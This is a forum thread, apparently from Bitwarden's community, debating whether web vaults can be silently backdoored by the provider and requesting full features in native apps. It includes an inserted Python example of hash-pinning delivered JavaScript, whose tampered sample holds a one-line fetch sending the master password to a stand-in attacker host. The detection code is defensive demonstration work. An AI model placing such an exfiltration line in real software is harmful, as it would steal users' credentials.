As a general rule, web apps are not safe enough for applications where you don't trust the service provider, such as password managers or e2ee messaging apps*. For this reason, I would like Bitwarden to not have a web version at all. But if there is a web version, at least these two things should be done:
Users must be warned that web apps are less safe than the native apps.
Native apps should have full functionality. I noticed that there is no ability to change the master password or its hint in the native apps, as well as account deletion and password reports (premium). These are the features I am requesting.
*The reason for this is that in web apps the code is re-delivered every time the app loads, so it can be undetectably backdoored.
Hi @kamran - you state above that the “native apps” for Bitwarden do not allow password changes. That’s not quite true. The desktop apps for Windows, MacOS, and Linux all provide this feature, as does the Android mobile app.
Also, I don't think it is fair to say that Bitwarden apps can be "undetectably backdoored" - in fact, the Bitwarden code is entirely open source, meaning that everyone who would like to monitor changes to the code has the ability to do so, making it quite transparent (and it likely has many more sets of eyes on it than the popular, proprietary commercial alternatives).
There is a wealth of information about the security measures in place with Bitwarden that you might find useful on the help pages starting with:
Even more so is the fact that Bitwarden is security focused at its core; they have undergone regular audits and security testing by third-party firms.
Everything from an extensive code audit to penetration testing, etc., all being open and disclosed to the public to view, which is extremely rare.
Audits aren’t cheap, and they are rarely ever disclosed publicly either.
And the same thing happens in the mobile app, but it does not allow me to take a screenshot.
I do appreciate the fact that Bitwarden is open source and audited. I was simply saying that this is not enough (but it is necessary) to protect from backdoors. Web apps in general are only secure against third parties, not against the service provider. And the reason is that if a backdoor is added to the production code (not to GitHub), it is detectable in a native app, since it is enough to download it once. But a web app gets downloaded from the Bitwarden server every time, and it is not possible to check for backdoors on every use.
While I agree this may arguably be a useful feature, in an ideal world anything that can be done in the web interface would also be doable in the desktop version and even the mobile apps and browser extensions.
I am a bit confused with
Could you provide some more detail in what you mean here? Is the service provider your ISP, the Microsoft Azure data centre, or Bitwarden as the provider of the applications?
I guess I am trying to understand the scenario you are trying to protect against and your threat model here. As well as further understand any concerns you may have.
GitHub is where the Bitwarden production code lives, all in the public eye of open source. If the theory is that the code running the app (either web or mobile) has been changed or somehow altered from the source code in GitHub, then arguably at that point anything could have been changed regardless of whether it was mobile or web.
In this context, "service provider" refers to either Azure, AWS, etc. or the Bitwarden team, but it does not refer to an ISP or a VPN provider, since TLS protects users from them. The threat model/scenario here is that the service provider may want to insert a backdoor directly into the production code, without adding it to GitHub. Theoretically, such a backdoor would be much easier to detect in native apps than in web apps, since in web apps the JavaScript code is loaded every time, and backdooring it only once is enough to steal a user's master password. And yes, you can simply ignore the "web apps are not secure" part and just add full functionality to native apps.
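To make the "verify once vs. re-delivered every load" point concrete, here is an added example (not from this thread and not Bitwarden's code) of what a client-side hash pin for a web client's JavaScript bundle looks like. The idea: a known-good copy of the served assets is hashed once into a manifest held on the user's side (the analogue of downloading a native app once), and every later delivery is compared against that pin. The bundles, file names and the `attacker.invalid` exfiltration line are all constructed for the demo; `sri_hash`, `build_manifest` and `verify_delivery` are names chosen here, not an existing API.

```python
"""Client-side hash pinning for a web client's delivered assets (added example).

Constructed demo: the bundles below are made up and stand in for the JS files a
web vault would serve. Nothing here is Bitwarden's own code.
"""
import base64
import hashlib
from typing import Dict, List


def sri_hash(data: bytes) -> str:
    """Subresource-Integrity style value, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.sha384(data).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def build_manifest(assets: Dict[str, bytes]) -> Dict[str, str]:
    """Pin a known-good snapshot: path -> expected integrity value.

    This is done once, out of band (e.g. after reviewing the served code or
    rebuilding it from the public source), and then stored client-side.
    """
    return {path: sri_hash(data) for path, data in assets.items()}


def verify_delivery(manifest: Dict[str, str], delivered: Dict[str, bytes]) -> List[str]:
    """Compare one delivery of the app against the pinned manifest.

    Returns a sorted list of findings; an empty list means every pinned asset
    arrived unchanged and nothing unexpected was added.
    """
    findings: List[str] = []
    for path, expected in manifest.items():
        if path not in delivered:
            findings.append(f"missing: {path}")
        elif sri_hash(delivered[path]) != expected:
            findings.append(f"changed: {path}")
    for path in delivered:
        if path not in manifest:
            # A silently added script is as dangerous as a modified one.
            findings.append(f"unexpected: {path}")
    return sorted(findings)


# --- constructed sample data ---------------------------------------------------
GOOD_BUNDLE: Dict[str, bytes] = {
    "app/main.js": b"export function unlock(pw) { return deriveKey(pw); }\n",
    "app/vendor.js": b"/* third-party crypto, identical on every load */\n",
}

# A later delivery where the server (or whoever controls it) slipped in a
# one-line exfiltration of the master password and an extra script.
TAMPERED_BUNDLE: Dict[str, bytes] = dict(GOOD_BUNDLE)
TAMPERED_BUNDLE["app/main.js"] = (
    GOOD_BUNDLE["app/main.js"]
    + b"fetch('https://attacker.invalid/?p=' + encodeURIComponent(pw));\n"
)
TAMPERED_BUNDLE["app/telemetry.js"] = b"/* not in the pinned snapshot */\n"

PINNED = build_manifest(GOOD_BUNDLE)


def check_good() -> List[str]:
    """Re-delivery of the exact pinned bundle: no findings."""
    return verify_delivery(PINNED, GOOD_BUNDLE)


def check_tampered() -> List[str]:
    """Backdoored re-delivery: the pin catches both the edit and the addition."""
    return verify_delivery(PINNED, TAMPERED_BUNDLE)


if __name__ == "__main__":
    print("pinned manifest:", PINNED)
    print("clean load   :", check_good() or "OK")
    print("tampered load:", check_tampered())
```

The caveat a practitioner should keep in mind: `integrity=` attributes inside the served HTML do not help against this threat model, because the HTML comes from the same server and can be rewritten together with the scripts. The pin only means something if it is held outside the server's control (a browser extension, a local proxy, or a script you run against each fetched bundle), which is exactly the property a once-downloaded native binary gets for free.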
Correct - you must use the Web Vault if you want to change your Master Password. For security reasons, I don’t think that is likely to change.
Assuming you are using a strong and unique password, there really should be no need to ever change your master password, unless of course you have reason to believe it may have been compromised.